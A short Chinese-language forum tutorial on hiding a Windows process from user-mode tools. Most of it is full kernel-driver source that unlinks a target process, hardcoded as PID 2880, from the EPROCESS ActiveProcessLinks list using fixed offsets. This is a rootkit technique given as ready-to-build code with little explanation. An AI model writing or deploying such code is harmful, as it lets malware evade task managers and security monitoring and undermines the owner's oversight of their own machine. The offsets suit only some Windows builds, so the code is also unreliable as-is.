驱动开发与系统原理-断链隐藏进程
今天介绍一种比较简单的隐藏进程的方法,其实只能骗骗3环下的检测原理
----
我们知道进程在0环中是靠双向链表链接的,我们打印进程的时候靠的是遍历双向链表,如果我们进行断链操作,就可以实现3环下的进程隐藏
代码
----
#include<ntifs.h>
VOID DriverUnload(PDRIVER_OBJECT pDriverObject) {
DbgPrint("Unload Driver Success! ");
}
NTSTATUS HideProcess(ULONG ulPid) {
DWORD_PTR pEprocess = NULL;
ULONG ulProcessID = 0;
//获取当前进程
pEprocess = (DWORD_PTR)PsGetCurrentProcess();
//获取双向链表
PLIST_ENTRY pActiveProcessLinks = (PLIST_ENTRY*)(pEprocess + 0xb8);
//指向下一个链表
PLIST_ENTRY pNextLinks = pActiveProcessLinks->Flink;
while (pNextLinks->Flink!= pActiveProcessLinks->Flink)
{
//回到当前进程的结构头部
pEprocess = (DWORD_PTR)pNextLinks - 0xb8;
//获取uid
ulProcessID = *((ULONG*)(pEprocess + 0xb4));
//判断进程id是否与参数进程id相等
if (ulProcessID==ulPid)
{
//进行断链操作
pNextLinks->Blink->Flink = pNextLinks->Flink;
pNextLinks->Flink->Blink = pNextLinks->Blink;
DbgPrint("Success!");
return STATUS_SUCCESS;
}
pNextLinks = pNextLinks->Flink;
}
DbgPrint("Failed!");
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath) {
DbgPrint("Load Driver Success!");
pDriverObject->DriverUnload = DriverUnload;
HideProcess(2880);
return STATUS_SUCCESS;
}
页:
[1]